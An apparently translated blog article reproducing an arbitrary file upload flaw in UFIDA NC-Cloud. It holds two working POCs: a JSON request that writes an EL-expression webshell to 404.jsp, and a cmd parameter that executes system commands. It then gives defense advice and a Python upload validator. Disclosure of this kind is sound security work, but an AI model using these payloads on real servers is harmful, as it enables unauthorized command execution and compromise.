UFIDA NC-Cloud full version arbitrary file upload vulnerability reproduction

Statement
This article is for technical exchange only; please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by disseminating or using the information provided in this article are the sole responsibility of the user; the author of the article bears no liability.
The author retains the right to modify and interpret this article. If you want to reprint or disseminate it, you must preserve it in full, including the copyright statement and all other content. Without permission, the content must not be modified, added to or deleted arbitrarily, and must not be used for commercial purposes in any way.

Vulnerability principle

An arbitrary file upload vulnerability affecting the full version of UFIDA NC-Cloud was recently disclosed. It has been confirmed that the vulnerability is exploitable by attackers, but the minimum affected version is not yet clear. An attacker can use it to upload arbitrary files to the server, including a webshell, and thereby gain command execution on the server.

Exploit

Two POCs are required to exploit this vulnerability.

The first POC:

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}

After execution there are two possible responses, a 404 or a 200. Testing showed that both responses indicate the upload succeeded.

The second POC is used for command execution:

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

Vulnerability reproduction - POC

Defense advice

The following are some common defense measures against the arbitrary file upload vulnerability in the full version of UFIDA NC-Cloud:

  1. Apply patches promptly: Keep UFIDA NC-Cloud on the latest software version and apply the vendor's security patches and updates as soon as they are released. This fixes known vulnerabilities and improves the overall security of the system.

  2. Restrict file uploads: Limiting the type, size and target path of user-uploaded files effectively reduces the risk of arbitrary file upload vulnerabilities. For example, validate file extensions and content, use an allow-list mechanism, and permit only specific file types to be uploaded.

  3. Verify uploaded files: It is essential that the server validates every file it receives. A secure validation mechanism checks the file's magic bytes, header information, trailer, and so on, to ensure the upload is the expected valid file type and to prevent malicious files from being stored.

  4. Strengthen access control: Enforce strict access control, including strong password policies, role-based permission management and multi-factor authentication, to reduce the risk of unauthorized access and of the vulnerability being abused.

  5. Security auditing and monitoring: Implement auditing and monitoring mechanisms, regularly review system logs, access logs and file upload logs, and detect abnormal activity and potential attacks in time.

  6. Security education and training: Provide security education and training for system administrators and users so that they understand common security threats and best practices, use the system correctly and respond appropriately to potential threats.
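As an added example (not code from the original post or from UFIDA), the following Python upload validator implements items 2 and 3 above on the server side: an extension allow-list with magic-byte checks, rejection of server-executable names such as the 404.jsp target used in the first POC, and confinement of the destination to the upload directory. The upload directory /tmp/uploads and the function names are assumptions for the example.

```python
from pathlib import Path
from typing import Tuple

# Allowed extensions mapped to the leading bytes ("magic") the content must start with.
ALLOWED_MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".pdf": [b"%PDF-"],
}

# Server-executable extensions that must never be written anywhere under the web root.
EXECUTABLE_EXT = {".jsp", ".jspx", ".jsw", ".jsv", ".jspf", ".war", ".jar", ".class"}


def validate_upload(filename: str, content: bytes, upload_root: str) -> Tuple[bool, str]:
    """Return (accepted, reason). Rejects by destination path, extension and magic bytes.

    filename is the client-supplied name (it may contain directory components),
    content is the raw upload body, upload_root is the assumed upload directory.
    """
    # Normalise and confine the destination: names like "../404.jsp" must not
    # leave the upload directory, and the upload directory itself is not a file.
    root = Path(upload_root).resolve()
    dest = (root / filename).resolve()
    if root not in dest.parents:
        return False, "path escapes upload directory"

    # Inspect every suffix so that "shell.jsp.png" is still caught.
    suffixes = [s.lower() for s in dest.suffixes]
    if not suffixes:
        return False, "missing extension"
    if any(s in EXECUTABLE_EXT for s in suffixes):
        return False, "server-executable extension"

    ext = suffixes[-1]
    if ext not in ALLOWED_MAGIC:
        return False, "extension not on allow-list"
    # The body must begin with the magic bytes expected for the claimed type,
    # so a JSP renamed to .png is rejected even though its name looks harmless.
    if not any(content.startswith(magic) for magic in ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs: a real PNG header and the POC's JSP target path.
    print(validate_upload("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8, "/tmp/uploads"))
    print(validate_upload("webapps/nc_web/404.jsp", b"<% %>", "/tmp/uploads"))
```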


Source: blog.csdn.net/qq_56698744/article/details/131943659